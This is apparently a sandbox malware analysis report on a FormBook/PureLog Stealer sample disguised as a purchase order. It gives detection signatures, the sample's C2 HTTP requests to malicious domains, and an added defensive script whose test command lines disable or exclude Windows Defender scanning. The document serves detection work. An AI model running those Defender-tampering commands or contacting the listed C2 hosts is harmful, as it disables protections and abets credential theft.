Windows Analysis Report
PO -2025918.exe

Overview

General Information

Sample name: PO -2025918.exe
Analysis ID: 1592062
MD5: cb01d48baf8a685f7f8233565e3cbfb7
SHA1: b205be3b958db2891cd2582131ed22d89b37bc07
SHA256: 7365e206478fad792a4c64390b32e1d21b16a5c080a6215eba8498c638877f06
Tags: exe, user-abuse_ch

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
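
The two Defender-related signatures above ("Adds a directory exclusion to Windows Defender", "Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet") describe a command line the report does not print. The following triage script is an added example, not part of the Joe Sandbox report or its Sigma rule; the command lines it scans are constructed to have the shape those signatures fire on. It decodes `-EncodedCommand` payloads (UTF-16LE, then base64) before matching, so one regex on the decoded script covers all three base64 alignments of the cmdlet name that a substring rule has to enumerate, and it also recognises the abbreviated switch forms (`-e`, `-ec`, `-enc`) PowerShell accepts.

```python
"""Spot Defender exclusions hidden behind -EncodedCommand.

Added example (not part of the Joe Sandbox report). The report flags a
base64-encoded MpPreference cmdlet but does not show the command line, so the
SAMPLE_CMDLINES below are constructed to have that shape.
"""
import base64
import re
from typing import Optional

ENCODED_FLAG = "encodedcommand"  # powershell.exe accepts any unambiguous prefix: -e, -ec, -enc, ...
MPPREF_CMDLET = re.compile(r"\b(?:Add|Set|Remove)-MpPreference\b", re.IGNORECASE)
TAMPER_PARAM = re.compile(
    r"-(?:Exclusion(?:Path|Process|Extension|IpAddress)|Disable\w+)\b", re.IGNORECASE
)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines: two tamper with Defender, two are benign.
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + encode_ps('Add-MpPreference -ExclusionPath "C:\\Users\\Public\\Libraries"'),
    "powershell.exe -w hidden -enc " + encode_ps("Set-MpPreference -DisableRealtimeMonitoring $true"),
    "powershell.exe -EncodedCommand " + encode_ps("Get-Process | Where-Object CPU -gt 100"),
    'powershell.exe -Command "Get-Date"',
]


def extract_encoded_payload(cmdline: str) -> Optional[str]:
    """Return the base64 blob that follows an -EncodedCommand style switch, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        # "-ExecutionPolicy" is not a prefix of "encodedcommand", so it is skipped here.
        if tok.startswith("-") and len(tok) > 1 and ENCODED_FLAG.startswith(tok[1:].lower()):
            return tokens[i + 1].strip("\"'")
    return None


def decode_powershell_b64(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand payload; None when it is not valid UTF-16LE base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def scan_cmdline(cmdline: str) -> Optional[dict]:
    """Return a finding when the decoded payload runs an *-MpPreference cmdlet, else None."""
    blob = extract_encoded_payload(cmdline)
    script = decode_powershell_b64(blob) if blob else None
    if not script:
        return None
    match = MPPREF_CMDLET.search(script)
    if not match:
        return None
    return {
        "cmdline": cmdline,
        "cmdlet": match.group(0),
        "params": [p.group(0) for p in TAMPER_PARAM.finditer(script)],
        "decoded": script,
    }


def scan_cmdlines(cmdlines: list) -> list:
    """Apply scan_cmdline to a batch of command lines and keep only the hits."""
    return [f for f in map(scan_cmdline, cmdlines) if f]


if __name__ == "__main__":
    for finding in scan_cmdlines(SAMPLE_CMDLINES):
        print(f"{finding['cmdlet']} {' '.join(finding['params'])}  <- {finding['decoded']}")
```

Feed it Sysmon Event ID 1 or Windows 4688 command lines. On the affected host itself, `Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess` shows what was added, and the Microsoft-Windows-Windows Defender/Operational log records each configuration change as Event ID 5007.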

Classification

AV Detection

Source: PO -2025918.exe Virustotal: Detection: 52%
Source: PO -2025918.exe ReversingLabs: Detection: 57%
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO -2025918.exe Joe Sandbox ML: detected
Source: PO -2025918.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PO -2025918.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose, 9_2_00AAC600
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 4x nop then xor eax, eax 9_2_00A99E10
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 4x nop then pop edi 9_2_00A9E21E
Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 4x nop then mov ebx, 00000004h 9_2_031A04CE

Networking

Source: DNS query: www.letsbookcruise.xyz
Source: Joe Sandbox View IP Address: 13.248.169.48
Source: Joe Sandbox View IP Address: 67.223.117.189
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: global traffic HTTP traffic detected: GET /tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw= HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Connection: close
    Host: www.zucchini.pro
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /54nj/?V0=jQd8/d8A1xfb/FB4a5ld7s51nRiuWU3OCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JhvpvAlNBW96dL3eN6Dv39YB+Yc5uDns7m3I=&6NWT=ubtLSzl HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Connection: close
    Host: www.vh5g.sbs
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /gq43/?V0=h/dnkFjaM/BlMTbdESaBO4yDKWKmOcDz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOE/Y8+3cOhgXpERP3XxTgx1mSo6tETBq5XpQ=&6NWT=ubtLSzl HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Connection: close
    Host: www.actionhub.live
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s= HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Connection: close
    Host: www.100millionjobs.africa
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Connection: close
    Host: www.qzsazi.info
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Connection: close
    Host: www.truckgoway.info
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Connection: close
    Host: www.aloezhealthcare.info
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
Source: global traffic DNS traffic detected: DNS query: www.zucchini.pro
Source: global traffic DNS traffic detected: DNS query: www.vh5g.sbs
Source: global traffic DNS traffic detected: DNS query: www.v89ey584d.shop
Source: global traffic DNS traffic detected: DNS query: www.actionhub.live
Source: global traffic DNS traffic detected: DNS query: www.100millionjobs.africa
Source: global traffic DNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
Source: global traffic DNS traffic detected: DNS query: www.hwak.live
Source: global traffic DNS traffic detected: DNS query: www.qzsazi.info
Source: global traffic DNS traffic detected: DNS query: www.truckgoway.info
Source: global traffic DNS traffic detected: DNS query: www.aloezhealthcare.info
Source: global traffic DNS traffic detected: DNS query: www.letsbookcruise.xyz
Source: unknown HTTP traffic detected: POST /54nj/ HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 199
    Connection: close
    Cache-Control: max-age=0
    Host: www.vh5g.sbs
    Origin: http://www.vh5g.sbs
    Referer: http://www.vh5g.sbs/54nj/
    User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
    Data Ascii: V0=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNO0o1TFAbBrSoQyOABKA6L8JNC4E4A6aRQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 15 Jan 2025 17:16:30 GMT
    Server: Apache
    Content-Length: 32106
    Connection: close
    Content-Type: text/html
    Data Ascii:
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="description" content="Fables">
        <meta name="author" content="Enterprise Development">
        <link rel="shortcut icon" href="assets/custom/images/shortcut.png">

        <title> 404</title>

        <!-- animate.css-->
        <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet">
        <!-- Load Screen -->
        <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet">
        <!-- GOOGLE FONT -->
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet">
        <!-- Font Awesome 5 -->
        <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet">
        <!-- Fables Icons -->
        <link href="assets/custom/css/fables-icons.css" rel="stylesheet">
        <!-- Bo
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 15 Jan 2025 17:16:33 GMT
    Server: Apache
    Content-Length: 32106
    Connection: close
    Content-Type: text/html
    Data Ascii: (same 32106-byte 404 page as the 17:16:30 response)
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 15 Jan 2025 17:16:35 GMT
    Server: Apache
    Content-Length: 32106
    Connection: close
    Content-Type: text/html
    Data Ascii: (same 32106-byte 404 page as the 17:16:30 response)
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Date: Wed, 15 Jan 2025 17:16:38 GMT
    Server: Apache
    Content-Length: 32106
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Ascii: (same 32106-byte 404 page as the 17:16:30 response)
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Wed, 15 Jan 2025 17:17:17 GMT
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Wed, 15 Jan 2025 17:17:20 GMT
    Transfer-Encoding: chunked
    Connection: close
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Source: ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9
Source: PO -2025918.exe, 00000000.00000002.1865271514.000000000279D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO -2025918.exe, 00000000.00000002.1879163401.0000000005119000.00000004.00000020.00020000.00000000.sdmp, PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.letsbookcruise.xyz
Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.letsbookcruise.xyz/coi2/
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: ROUTE.EXE, 00000009.00000002.3541757344.0000000003E36000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003986000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.vh5g.sbs/
Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fasthosts.co.uk/
Source: ROUTE.EXE, 00000009.00000002.3541757344.000000000415A000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003CAA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ROUTE.EXE, 00000009.00000003.2301997952.0000000007BB6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_
Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1

E-Banking Fraud

Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
